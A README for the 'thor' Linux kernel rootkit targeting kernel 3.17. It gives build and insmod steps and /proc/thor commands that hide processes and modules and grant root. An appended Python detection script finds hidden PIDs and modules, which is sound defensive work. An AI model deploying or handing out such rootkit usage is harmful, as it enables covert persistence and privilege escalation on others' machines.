The Horrific Omnipotent Rootkit - or something like that, targeted at kernel 3.17 (archlinux LTS at the time of writing).
Apart from the linux kernel headers, the linux source code is required in order to build this rootkit since unexported code is used.
Just make sure /usr/src/linux points to the linux source directory of the target kernel, or simply change the Makefile.
# pacman -S abs linux-headers
# abs
# cd /var/abs/core/linux
# makepkg -o --asroot
# ln -s /var/abs/core/linux/src/linux-3.17 /usr/src/linux
$ cd /path/to/thor
$ make
# insmod thor.ko
usage:
echo hp PID > /proc/thor (hides process PID)
echo up PID > /proc/thor (unhides process PID)
echo upa > /proc/thor (unhide all PIDs)
echo hm MODULE > /proc/thor (hide module)
echo um MODULE > /proc/thor (unhide module)
echo uma > /proc/thor (unhide all modules)
echo root > /proc/thor (gain root privileges)
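The two hiding features above (processes removed from the /proc listing, modules removed from /proc/modules) are what a defender would want to check for on a host. The following is an added example, not part of the thor project: it compares what the kernel still answers for with what the usual listings show. Hidden processes are found by probing every PID up to pid_max with kill(pid, 0) and flagging those that answer but are absent from /proc; hidden modules are found by comparing /proc/modules with the loadable modules that still expose /sys/module/<name>/initstate. The pure functions take constructed inputs so the logic can be exercised without a rootkit present; only the standard Linux paths /proc, /proc/modules, /sys/module and /proc/sys/kernel/pid_max are assumed.

```python
"""Defender-side checks for two hiding tricks a /proc-driven rootkit offers:
processes missing from the /proc listing and modules missing from /proc/modules.
Added example; not part of the thor project."""
import os
from typing import Callable, Iterable, Set


def listed_ids(proc: str = "/proc") -> Set[int]:
    """PIDs and TIDs reachable through the /proc directory tree.
    Thread IDs are included because kill(tid, 0) succeeds for a live thread,
    so leaving them out would make every thread look like a hidden process."""
    ids: Set[int] = set()
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        ids.add(int(name))
        try:
            task_dir = os.path.join(proc, name, "task")
            ids.update(int(t) for t in os.listdir(task_dir) if t.isdigit())
        except OSError:  # process exited meanwhile, or task dir not readable
            pass
    return ids


def id_exists(pid: int) -> bool:
    """Signal-0 probe: ESRCH means no such task; EPERM means the task exists
    but belongs to another user, which still counts as existing."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def hidden_ids(listed: Set[int], exists: Callable[[int], bool], pid_max: int) -> Set[int]:
    """IDs that answer a probe but are absent from the listing. Kept pure so it
    can run on constructed inputs; a live run passes listed_ids() and id_exists."""
    return {pid for pid in range(1, pid_max + 1) if pid not in listed and exists(pid)}


def read_pid_max(path: str = "/proc/sys/kernel/pid_max") -> int:
    with open(path) as f:
        return int(f.read().strip())


def proc_modules_names(text: str) -> Set[str]:
    """The first field of each /proc/modules line is the module name."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def sysfs_loaded_modules(sysfs: str = "/sys/module") -> Set[str]:
    """Loadable modules expose /sys/module/<name>/initstate; built-in code that
    appears in /sys/module only because it has parameters does not."""
    try:
        names = os.listdir(sysfs)
    except OSError:
        return set()
    return {n for n in names if os.path.exists(os.path.join(sysfs, n, "initstate"))}


def hidden_modules(proc_modules_text: str, sysfs_loaded: Iterable[str]) -> Set[str]:
    """Loaded modules known to sysfs but missing from /proc/modules (lsmod)."""
    return set(sysfs_loaded) - proc_modules_names(proc_modules_text)


def live_report() -> dict:
    """Run both checks against this host. Probing 1..pid_max is slow with a
    large pid_max, and a process that exits or starts between the listing and
    the probe would be a false positive, so candidates are re-checked against
    a fresh listing before being reported."""
    candidates = hidden_ids(listed_ids(), id_exists, read_pid_max())
    fresh = listed_ids()
    pids = {p for p in candidates if p not in fresh and id_exists(p)}
    with open("/proc/modules") as f:
        mods = hidden_modules(f.read(), sysfs_loaded_modules())
    return {"hidden_pids": sorted(pids), "hidden_modules": sorted(mods)}


if __name__ == "__main__":
    print(live_report())
```

Run it as root so the PID probe is not limited by EPERM noise and the module listing is complete. A module that also removes its kobject from /sys/module will not show up in the second check; an empty result from this script is therefore not proof of a clean host, only the absence of the two specific inconsistencies it looks for.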
- Franz-Josef Haider
- Alex Hirsch